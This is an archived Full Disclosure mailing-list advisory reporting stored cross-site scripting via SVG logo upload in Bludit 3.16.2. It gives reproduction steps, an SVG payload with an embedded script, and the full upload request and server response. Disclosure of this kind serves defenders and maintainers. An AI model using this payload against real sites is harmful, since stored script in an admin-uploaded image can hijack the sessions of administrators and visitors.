| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1as4goTzNS0CCXP4kOmot7f05EXc_WWHL-cpryDBRZ5YQ@mail.gmail.com>
Date: Sun, 6 Jul 2025 22:50:26 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] XSS via SVG File Uploa - bluditv3.16.2
# Exploit Title: XSS via SVG File Upload - bluditv3.16.2
# Date: 07/2025
# Exploit Author: Andrey Stoykov
# Version: 3.16.2
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
XSS via SVG File Upload #1:
Steps to Reproduce:
1. Login with admin account and click on "General" > "Logo"
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="
http://www.w3.org/2000/svg">
<script type="text/javascript">alert('xss');</script>
</svg>
// HTTP POST Request Uploading the SVG File
POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0)
Gecko/20100101 Firefox/141.0
[...]
------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4
Content-Disposition: form-data; name="tokenCSRF"
59fc6f48ad5d60b39699491cada2390e1b42531b
------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4
Content-Disposition: form-data; name="inputFile";
filename="evilsvgfile-xss-bypass.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="
http://www.w3.org/2000/svg">
<script type="text/javascript">alert('xss');</script>
</svg>
------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4--
// HTTP Response
HTTP/1.1 200 OK
Date: Sat, 28 Jun 2025 21:16:10 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]
{"status":0,"message":"Image
uploaded.","filename":"test.svg","absoluteURL":"http:\/\/192.168.58.133
\/bludit\/bl-content\/uploads\/test.svg","absolutePath":"\/opt\/lampp\/htdocs\/bludit\/bl-content\/uploads\/test.svg"}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists